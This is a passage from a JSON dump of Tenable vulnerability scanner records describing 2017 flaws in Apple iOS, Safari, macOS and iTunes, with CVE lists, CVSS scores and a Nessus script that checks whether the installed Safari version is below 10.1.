HTTPProtocol\n - ImageIO\n - iTunes Store\n - JavaScriptCore\n - Kernel\n - Keyboards\n - libarchive\n - libc++abi\n - libxslt\n - Pasteboard\n - Phone\n - Profiles\n - Quick Look\n - Safari\n - Safari Reader\n - SafariViewController\n - Security\n - Siri\n - WebKit\n - WebKit JavaScript Bindings\n - WebKit Web Inspector", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-03-31T00:00:00", "type": "nessus", "title": "Apple iOS < 10.3 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3619", "CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2364", "CVE-2017-2367", "CVE-2017-2376", "CVE-2017-2377", "CVE-2017-2378", "CVE-2017-2379", "CVE-2017-2380", "CVE-2017-2384", "CVE-2017-2386", "CVE-2017-2389", "CVE-2017-2390", "CVE-2017-2393", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2397", "CVE-2017-2398", "CVE-2017-2399", "CVE-2017-2400", "CVE-2017-2401", "CVE-2017-2404", "CVE-2017-2405", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2412", "CVE-2017-2414", "CVE-2017-2415", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2419", "CVE-2017-2423", "CVE-2017-2424", "CVE-2017-2428", "CVE-2017-2430", "CVE-2017-2432", "CVE-2017-2433", "CVE-2017-2434", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2442", "CVE-2017-2444", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2448", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2452", "CVE-2017-2453", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2456", "CVE-2017-2457", "CVE-2017-2458", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2467", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2478", "CVE-2017-2481", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2484", "CVE-2017-2485", "CVE-2017-2486", "CVE-2017-2487", "CVE-2017-2490", "CVE-2017-2491", "CVE-2017-2492", "CVE-2017-6976"], "modified": "2022-07-19T00:00:00", "cpe": ["cpe:/o:apple:iphone_os"], "id": "APPLE_IOS_103_CHECK.NBIN", "href": "https://www.tenable.com/plugins/nessus/99127", "sourceData": "Binary data apple_ios_103_check.nbin", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:37:13", "description": "Versions of Safari prior to 10.1 are affected by multiple vulnerabilities :\n\n - An unspecified state management flaw exists that may allow a context-dependent attacker to spoof the address bar. No further details have been provided. (CVE-2017-2376)\n - An unspecified flaw exists in the handling of HTTP authentication. This may allow a context-dependent attacker to display authentication sheets on arbitrary web sites and cause a denial of service. (CVE-2017-2389)\n\nAdditional flaws exist in the following components :\n\n - AutofFill (CVE-2017-2385)\n - CoreGraphics (CVE-2017-2444)\n - FaceTime (2017-2453)\n - Kernel (CVE-2017-2490)\n - Webkit (CVE-2017-2367, CVE-2017-2378, CVE-2017-2386, CVE-2017-2394, CVE-2017-2395, CVE-2017-2396, CVE-2017-2405, CVE-2017-2415, CVE-2017-2419, CVE-2017-2424, CVE-2017-2433, CVE-2017-2442, CVE-2017-2445, CVE-2017-2446, CVE-2017-2447, CVE-2017-2454, CVE-2017-2455, CVE-2017-2459, CVE-2017-2460, CVE-2017-2464, CVE-2017-2465, CVE-2017-2466, CVE-2017-2468, CVE-2017-2469, CVE-2017-2470, CVE-2017-2471, CVE-2017-2476, CVE-2017-2481)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-03-31T00:00:00", "type": "nessus", "title": "Safari < 10.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-2367", "CVE-2017-2376", "CVE-2017-2386", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2405", "CVE-2017-2415", "CVE-2017-2419", "CVE-2017-2433", "CVE-2017-2442", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2481", "CVE-2017-2490", "CVE-2017-2389", "CVE-2017-2453", "CVE-2017-2444", "CVE-2017-2378", "CVE-2017-2424", "CVE-2017-2385"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:*"], "id": "700033.PRM", "href": "https://www.tenable.com/plugins/nnm/700033", "sourceData": "Binary data 700033.prm", "cvss": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-16T13:44:37", "description": "The version of Apple Safari installed on the remote macOS or Mac OS X host is prior to 10.1. It is, therefore, affected by multiple vulnerabilities:\n\n - An out-of-bounds read error exists in WebKit when handling certain JavaScript code. An unauthenticated, remote attacker can exploit this to cause a denial of service condition or the disclosure of memory contents.\n (CVE-2016-9642)\n\n - A denial of service vulnerability exists in WebKit when handling certain regular expressions. An unauthenticated, remote attacker can exploit this, via a specially crafted web page, to exhaust available memory resources. (CVE-2016-9643)\n\n - Multiple information disclosure vulnerabilities exist in WebKit when handling page loading due to improper validation of certain input. An unauthenticated, remote attacker can exploit these to disclose data cross-origin. (CVE-2017-2364, CVE-2017-2367)\n\n - An unspecified state management flaw exists that allows an unauthenticated, remote attacker to spoof the address bar. (CVE-2017-2376)\n\n - A denial of service vulnerability exists in the Web Inspector component when closing a window while the debugger is paused. An unauthenticated, remote attacker can exploit this to terminate the application.\n (CVE-2017-2377)\n\n - An unspecified flaw exists in WebKit when creating bookmarks using drag-and-drop due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via a specially crafted link, to spoof bookmarks or potentially execute arbitrary code.\n (CVE-2017-2378)\n\n - An information disclosure vulnerability exists in the Login AutofFill component that allows a local attacker to access keychain items. (CVE-2017-2385)\n\n - Multiple information disclosure vulnerabilities exist in WebKit when handling unspecified exceptions or elements. An unauthenticated, remote attacker can exploit these, via specially crafted web content, to disclose data cross-origin. (CVE-2017-2386, CVE-2017-2479, CVE-2017-2480)\n\n - An unspecified flaw exists in the handling of HTTP authentication that allows an unauthenticated, remote attacker to disclose authentication sheets on arbitrary websites or cause a denial of service condition.\n (CVE-2017-2389)\n\n - Multiple memory corruption issues exist in WebKit that allow an unauthenticated, remote attacker to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2394, CVE-2017-2395, CVE-2017-2396, CVE-2017-2433, CVE-2017-2454, CVE-2017-2455, CVE-2017-2459, CVE-2017-2460, CVE-2017-2464, CVE-2017-2465, CVE-2017-2466, CVE-2017-2468, CVE-2017-2469, CVE-2017-2470, CVE-2017-2476)\n\n - A memory corruption issue exists in WebKit within the Web Inspector component due to improper validation of certain input. An unauthenticated, remote attacker can exploit this to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2405)\n\n - An unspecified type confusion error exists that allows an unauthenticated remote attacker to execute arbitrary code by using specially crafted web content.\n (CVE-2017-2415)\n\n - A security bypass vulnerability exists in WebKit that allows an unauthenticated, remote attacker to bypass the Content Security Policy by using specially crafted web content. (CVE-2017-2419)\n\n - An unspecified flaw exists in WebKit when handling OpenGL shaders that allows an unauthenticated, remote attacker to disclose process memory content by using specially crafted web content. (CVE-2017-2424)\n\n - An information disclosure vulnerability exists in WebKit JavaScript Bindings when handling page loading due to unspecified logic flaws. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to disclose data cross-origin. (CVE-2017-2442)\n\n - A memory corruption issue exists in WebKit within the CoreGraphics component due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2444)\n\n - A universal cross-site scripting (XSS) vulnerability exists in WebKit when handling frame objects due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to execute arbitrary script code in a user's browser session. (CVE-2017-2445)\n\n - A flaw exists in WebKit due to non-strict mode functions that are called from built-in strict mode scripts not being properly restricted from calling sensitive native functions. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to execute arbitrary code. (CVE-2017-2446)\n\n - An out-of-bounds read error exists in WebKit when handling the bound arguments array of a bound function.\n An unauthenticated, remote attacker can exploit this, via specially crafted web content, to disclose memory contents. (CVE-2017-2447)\n\n - An unspecified flaw exists in FaceTime prompt handling due to improper validation of certain input. An unauthenticated, remote attacker can exploit this to spoof user interface elements. (CVE-2017-2453)\n\n - A use-after-free error exists in WebKit when handling RenderBox objects. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2017-2463)\n\n - An unspecified use-after-free error exists in WebKit that allows an unauthenticated, remote attacker, via specially crafted web content, to dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2017-2471)\n\n - A universal cross-site scripting (XSS) vulnerability exists in WebKit when handling frames due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to execute arbitrary script code in a user's browser session. (CVE-2017-2475)\n\n - A use-after-free error exists in WebKit when handling ElementData objects. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2017-2481)\n\n - A use-after-free error exists in JavaScriptCore when handling the String.replace() method. An unauthenticated, remote attacker can exploit this to deference already freed memory, resulting in the execution of arbitrary code. (CVE-2017-2491)\n\n - A universal cross-site scripting (XSS) vulnerability exists in JavaScriptCore due to an unspecified prototype flaw. An unauthenticated, remote attacker can exploit this, via a specially crafted web page, to execute arbitrary code in a user's browser session.\n (CVE-2017-2492)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-04-03T00:00:00", "type": "nessus", "title": "macOS : Apple Safari < 10.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2364", "CVE-2017-2367", "CVE-2017-2376", "CVE-2017-2377", "CVE-2017-2378", "CVE-2017-2385", "CVE-2017-2386", "CVE-2017-2389", "CVE-2017-2392", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2405", "CVE-2017-2415", "CVE-2017-2419", "CVE-2017-2424", "CVE-2017-2433", "CVE-2017-2442", "CVE-2017-2444", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2453", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2457", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2463", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2481", "CVE-2017-2486", "CVE-2017-2491", "CVE-2017-2492", "CVE-2017-2493", "CVE-2017-7071"], "modified": "2019-07-03T00:00:00", "cpe": ["cpe:/a:apple:safari", "cpe:/o:apple:mac_os_x"], "id": "MACOSX_SAFARI10_1.NASL", "href": "https://www.tenable.com/plugins/nessus/99167", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99167);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/07/03 12:01:40\");\n\n script_cve_id(\n \"CVE-2016-9642\",\n \"CVE-2016-9643\",\n \"CVE-2017-2364\",\n \"CVE-2017-2367\",\n \"CVE-2017-2376\",\n \"CVE-2017-2377\",\n \"CVE-2017-2378\",\n \"CVE-2017-2385\",\n \"CVE-2017-2386\",\n \"CVE-2017-2389\",\n \"CVE-2017-2392\",\n \"CVE-2017-2394\",\n \"CVE-2017-2395\",\n \"CVE-2017-2396\",\n \"CVE-2017-2405\",\n \"CVE-2017-2415\",\n \"CVE-2017-2419\",\n \"CVE-2017-2424\",\n \"CVE-2017-2433\",\n \"CVE-2017-2442\",\n \"CVE-2017-2444\",\n \"CVE-2017-2445\",\n \"CVE-2017-2446\",\n \"CVE-2017-2447\",\n \"CVE-2017-2453\",\n \"CVE-2017-2454\",\n \"CVE-2017-2455\",\n \"CVE-2017-2457\",\n \"CVE-2017-2459\",\n \"CVE-2017-2460\",\n \"CVE-2017-2463\",\n \"CVE-2017-2464\",\n \"CVE-2017-2465\",\n \"CVE-2017-2466\",\n \"CVE-2017-2468\",\n \"CVE-2017-2469\",\n \"CVE-2017-2470\",\n \"CVE-2017-2471\",\n \"CVE-2017-2475\",\n \"CVE-2017-2476\",\n \"CVE-2017-2479\",\n \"CVE-2017-2480\",\n \"CVE-2017-2481\",\n \"CVE-2017-2486\",\n \"CVE-2017-2491\",\n \"CVE-2017-2492\",\n \"CVE-2017-2493\",\n \"CVE-2017-7071\"\n );\n script_bugtraq_id(\n 100613,\n 94554,\n 94559,\n 95725,\n 97129,\n 97130,\n 97131,\n 97133,\n 97136,\n 97140,\n 97143,\n 97147,\n 97176,\n 98316,\n 98700\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-03-27-2\");\n\n script_name(english:\"macOS : Apple Safari < 10.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the Safari version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS or Mac OS X host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple Safari installed on the remote macOS or Mac OS X \nhost is prior to 10.1. It is, therefore, affected by multiple\nvulnerabilities:\n\n - An out-of-bounds read error exists in WebKit when\n handling certain JavaScript code. An unauthenticated,\n remote attacker can exploit this to cause a denial of\n service condition or the disclosure of memory contents.\n (CVE-2016-9642)\n\n - A denial of service vulnerability exists in WebKit when\n handling certain regular expressions. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted web page, to exhaust available memory\n resources. (CVE-2016-9643)\n\n - Multiple information disclosure vulnerabilities exist\n in WebKit when handling page loading due to improper\n validation of certain input. An unauthenticated, remote\n attacker can exploit these to disclose data\n cross-origin. (CVE-2017-2364, CVE-2017-2367)\n\n - An unspecified state management flaw exists that allows\n an unauthenticated, remote attacker to spoof the address\n bar. (CVE-2017-2376)\n\n - A denial of service vulnerability exists in the Web\n Inspector component when closing a window while the\n debugger is paused. An unauthenticated, remote attacker\n can exploit this to terminate the application.\n (CVE-2017-2377)\n\n - An unspecified flaw exists in WebKit when creating\n bookmarks using drag-and-drop due to improper validation\n of certain input. An unauthenticated, remote attacker\n can exploit this, via a specially crafted link, to spoof\n bookmarks or potentially execute arbitrary code.\n (CVE-2017-2378)\n\n - An information disclosure vulnerability exists in the\n Login AutofFill component that allows a local attacker\n to access keychain items. (CVE-2017-2385)\n\n - Multiple information disclosure vulnerabilities exist\n in WebKit when handling unspecified exceptions or\n elements. An unauthenticated, remote attacker can\n exploit these, via specially crafted web content, to\n disclose data cross-origin. (CVE-2017-2386,\n CVE-2017-2479, CVE-2017-2480)\n\n - An unspecified flaw exists in the handling of HTTP\n authentication that allows an unauthenticated, remote\n attacker to disclose authentication sheets on arbitrary\n websites or cause a denial of service condition.\n (CVE-2017-2389)\n\n - Multiple memory corruption issues exist in WebKit that\n allow an unauthenticated, remote attacker to cause a\n denial of service condition or the execution of\n arbitrary code. (CVE-2017-2394, CVE-2017-2395,\n CVE-2017-2396, CVE-2017-2433, CVE-2017-2454,\n CVE-2017-2455, CVE-2017-2459, CVE-2017-2460,\n CVE-2017-2464, CVE-2017-2465, CVE-2017-2466,\n CVE-2017-2468, CVE-2017-2469, CVE-2017-2470,\n CVE-2017-2476)\n\n - A memory corruption issue exists in WebKit within the\n Web Inspector component due to improper validation of\n certain input. An unauthenticated, remote attacker can\n exploit this to cause a denial of service condition or\n the execution of arbitrary code. (CVE-2017-2405)\n\n - An unspecified type confusion error exists that allows\n an unauthenticated remote attacker to execute arbitrary\n code by using specially crafted web content.\n (CVE-2017-2415)\n\n - A security bypass vulnerability exists in WebKit that\n allows an unauthenticated, remote attacker to bypass the\n Content Security Policy by using specially crafted web\n content. (CVE-2017-2419)\n\n - An unspecified flaw exists in WebKit when handling\n OpenGL shaders that allows an unauthenticated, remote\n attacker to disclose process memory content by using\n specially crafted web content. (CVE-2017-2424)\n\n - An information disclosure vulnerability exists in WebKit\n JavaScript Bindings when handling page loading due to\n unspecified logic flaws. An unauthenticated, remote\n attacker can exploit this, via specially crafted web\n content, to disclose data cross-origin. (CVE-2017-2442)\n\n - A memory corruption issue exists in WebKit within the\n CoreGraphics component due to improper validation of\n certain input. An unauthenticated, remote attacker can\n exploit this, via specially crafted web content, to\n cause a denial of service condition or the execution of\n arbitrary code. (CVE-2017-2444)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in WebKit when handling frame objects due to\n improper validation of certain input. An\n unauthenticated, remote attacker can exploit this, via\n specially crafted web content, to execute arbitrary\n script code in a user's browser session. (CVE-2017-2445)\n\n - A flaw exists in WebKit due to non-strict mode functions\n that are called from built-in strict mode scripts not\n being properly restricted from calling sensitive native\n functions. An unauthenticated, remote attacker can\n exploit this, via specially crafted web content, to\n execute arbitrary code. (CVE-2017-2446)\n\n - An out-of-bounds read error exists in WebKit when\n handling the bound arguments array of a bound function.\n An unauthenticated, remote attacker can exploit this,\n via specially crafted web content, to disclose memory\n contents. (CVE-2017-2447)\n\n - An unspecified flaw exists in FaceTime prompt handling\n due to improper validation of certain input. An\n unauthenticated, remote attacker can exploit this to\n spoof user interface elements. (CVE-2017-2453)\n\n - A use-after-free error exists in WebKit when handling\n RenderBox objects. An unauthenticated, remote attacker\n can exploit this, via specially crafted web content, to\n dereference already freed memory, resulting in the\n execution of arbitrary code. (CVE-2017-2463)\n\n - An unspecified use-after-free error exists in WebKit\n that allows an unauthenticated, remote attacker, via\n specially crafted web content, to dereference already\n freed memory, resulting in the execution of arbitrary\n code. (CVE-2017-2471)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in WebKit when handling frames due to improper\n validation of certain input. An unauthenticated, remote\n attacker can exploit this, via specially crafted web\n content, to execute arbitrary script code in a user's\n browser session. (CVE-2017-2475)\n\n - A use-after-free error exists in WebKit when handling\n ElementData objects. An unauthenticated, remote attacker\n can exploit this, via specially crafted web content, to\n dereference already freed memory, resulting in the\n execution of arbitrary code. (CVE-2017-2481)\n\n - A use-after-free error exists in JavaScriptCore when\n handling the String.replace() method. An\n unauthenticated, remote attacker can exploit this to\n deference already freed memory, resulting in the\n execution of arbitrary code. (CVE-2017-2491)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in JavaScriptCore due to an unspecified prototype\n flaw. An unauthenticated, remote attacker can exploit\n this, via a specially crafted web page, to execute\n arbitrary code in a user's browser session.\n (CVE-2017-2492)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207600\");\n # https://lists.apple.com/archives/security-announce/2017/Mar/msg00003.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b6d82a85\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple Safari version 10.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-2378\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/10/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:safari\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_apple_safari_installed.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Safari/Installed\");\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nos = get_kb_item('Host/MacOSX/Version');\nif (!os) audit(AUDIT_OS_NOT, 'Mac OS X or macOS');\n\nif (!preg(pattern:\"Mac OS X 10\\.(10|11|12)([^0-9]|$)\", string:os))\n audit(AUDIT_OS_NOT, 'Mac OS X Yosemite 10.10 / Mac OS X El Capitan 10.11 / macOS Sierra 10.12');\n\nget_kb_item_or_exit('MacOSX/Safari/Installed', exit_code:0);\npath = get_kb_item_or_exit('MacOSX/Safari/Path', exit_code:1);\nversion = get_kb_item_or_exit('MacOSX/Safari/Version', exit_code:1);\n\nfixed_version = '10.1';\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n report = report_items_str(\n report_items:make_array(\n 'Path', path,\n 'Installed version', version,\n 'Fixed version', fixed_version\n ),\n ordered_fields:make_list('Path', 'Installed version', 'Fixed version')\n );\n security_report_v4(port:0, severity:SECURITY_WARNING, extra:report);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, 'Safari', version, path);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:37:14", "description": "The remote host is running a version of Mac OS X version 10.x prior to 10.12.4 , and is affected by multiple vulnerabilities :\n\n - A format string flaw exists that is triggered as string format specifiers (e.g. %s and %x) are not properly used when handling IPP(S) links. This may allow a context-dependent attacker to potentially execute arbitrary code. (CVE-2017-2403)\n - A flaw exists in the 'SecKeyRawVerify()' function that is triggered as parameters are not properly validated during the handling of cryptographic API call. This may allow a remote attacker to have an empty signature be accepted as valid. (CVE-2017-2423)\n - A type confusion flaw exists that is triggered as certain input is not properly validated when parsing specially crafted M4A audio files. This may allow a context-dependent attacker to corrupt memory and potentially execute arbitrary code. (CVE-2017-2430)\n - A use-after-free flaw exists in 'libc++' that is triggered when demangling C++ applications. This may allow a malicious application to dereference already freed memory and potentially execute arbitrary code. (CVE-2017-2441)\n - A flaw exists as OTR packets are not properly validated. By spoofing the TLS/SSL server via a packet that appears valid, an attacker with the ability to intercept network traffic (e.g. MitM, DNS cache poisoning) can disclose and optionally manipulate transmitted data. (CVE-2017-2448)\n - An overflow condition exists that is triggered as certain input is not properly validated when parsing specially crafted M4A audio files. This may allow a context-dependent attacker to cause a heap-based buffer overflow, potentially allowing execution of arbitrary code. (CVE-2017-2462)\n - An unspecified flaw exists that is triggered as certain input is not properly validated when parsing X.509 certificates. This may allow a context dependent-attacker to corrupt memory and potentially execute arbitrary code. (CVE-2017-2485)\n\nAdditional flaws exist in the following components :\n\n - AppleGraphicsPowerManagement (CVE-2017-2421)\n - AppleRAID (CVE-2017-2438)\n - Bluetooth (CVE-2017-2420, CVE-2017-2427, CVE-2017-2449)\n - Carbon (CVE-2017-2379)\n - CoreGraphics (CVE-2017-2417)\n - CoreMedia (2017-2431)\n - CoreText (CVE-2017-2435, CVE-2017-2450, CVE-2017-2461)\n - EFI (CVE-2016-7585)\n - Finderkit (CVE-2017-2429)\n - FontParser (CVE-2017-2406, CVE-2017-2407, CVE-2017-2439, CVE-2017-2487)\n - Hypervisor (CVE-2017-2418)\n - iBooks (CVE-2017-2426)\n - IOATAFamily (CVE-2017-2408)\n - IOFireWireAVC (CVE-2017-2436, CVE-2017-2437)\n - IOFireWireFamily (CVE-2017-2388)\n - ImageIO (CVE-2017-2416, CVE-2017-2432, CVE-2017-2467)\n - Intel Graphics (CVE-2017-2443)\n - Kernel (CVE-2017-2398, CVE-2017-2401, CVE-2017-2410, 2017-2440, 2017-2456, CVE-2017-2472, CVE-2017-2473, CVE-2017-2474, CVE-2017-2478, CVE-2017-2482, CVE-2017-2483, CVE-2017-2489, CVE-2017-2490)\n - Keyboards (CVE-2017-2458)\n - libarchive (CVE-2017-2390)\n - libxslt (CVE-2017-2477)\n - MCX (CVE-2017-2402)\n - Menus (CVE-2017-2409)\n - Multi-touch (CVE-2017-2422)\n - nghttp2 (CVE-2017-2428)\n - QuickTime (2017-2413)\n - Security (2017-2451, 2017-6974)\n - SecurityFoundation (CVE-2017-2425)\n - sudo (CVE-2017-2381)\n - WebKit (CVE-2017-2392, CVE-2017-2457, CVE-2017-2486)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-03-31T00:00:00", "type": "nessus", "title": "Mac OS X 10.x < 10.12.4 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-2392", "CVE-2017-2457", "CVE-2016-7585", "CVE-2017-2379", "CVE-2017-2381", "CVE-2017-2388", "CVE-2017-2390", "CVE-2017-2398", "CVE-2017-2401", "CVE-2017-2402", "CVE-2017-2403", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2408", "CVE-2017-2409", "CVE-2017-2410", "CVE-2017-2413", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2418", "CVE-2017-2420", "CVE-2017-2421", "CVE-2017-2422", "CVE-2017-2423", "CVE-2017-2425", "CVE-2017-2426", "CVE-2017-2427", "CVE-2017-2428", "CVE-2017-2429", "CVE-2017-2430", "CVE-2017-2431", "CVE-2017-2432", "CVE-2017-2435", "CVE-2017-2436", "CVE-2017-2437", "CVE-2017-2438", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2443", "CVE-2017-2448", "CVE-2017-2449", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2456", "CVE-2017-2458", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2467", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2477", "CVE-2017-2478", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2485", "CVE-2017-2487", "CVE-2017-2489", "CVE-2017-2490", "CVE-2017-6974", "CVE-2017-2486"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*"], "id": "700032.PRM", "href": "https://www.tenable.com/plugins/nnm/700032", "sourceData": "Binary data 700032.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:36:49", "description": "Versions of iTunes prior to 12.6 are affected by multiple vulnerabilities :\n\n - A use-after-free condition exists that is triggered when handling RenderBox objects. With specially crafted web content, a context-dependent attacker can dereference already freed memory and potentially execute arbitrary code. (CVE-2017-2463)\n - A flaw exists that allows a universal cross-site scripting (UXSS) attack. This flaw exists because the 'notifyChildNodeRemoved()' function in 'WebCore/dom/ContainerNodeAlgorithms.cpp' executes script code synchronously. This may allow a context-dependent attacker to create a specially crafted web page that executes arbitrary script code in a user's browser session within the trust relationship between their browser and any server. (CVE-2017-2479)\n - A flaw exists that allows a UXSS attack. This flaw exists because the program does not properly revalidates the 'SubframeLoader::requestFrame()' function in 'WebCore/loader/SubframeLoader.cpp'. This may allow a context-dependent attacker to create a specially crafted web page that executes arbitrary script code in a user's browser session within the trust relationship between their browser and any server. (CVE-2017-2480)", "cvss3": {"score": 5.6, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2017-05-17T00:00:00", "type": "nessus", "title": "iTunes < 12.6 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-2463", "CVE-2017-2479", "CVE-2017-2480"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:apple:itunes:*:*:*:*:*:*:*:*"], "id": "700114.PRM", "href": "https://www.tenable.com/plugins/nnm/700114", "sourceData": "Binary data 700114.prm", "cvss": {"score": 6.8, "vector": "CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-11T15:09:49", "description": "The remote host is running a version of macOS that is 10.12.x prior to 10.12.4. It is, therefore, affected by multiple vulnerabilities in multiple components, some of which are remote code execution vulnerabilities. An unauthenticated, remote attacker can exploit these remote code execution vulnerabilities by convincing a user to visit a specially crafted website, resulting in the execution of arbitrary code in the context of the current user. The affected components are as follows :\n\n - apache\n - apache_mod_php\n - AppleGraphicsPowerManagement\n 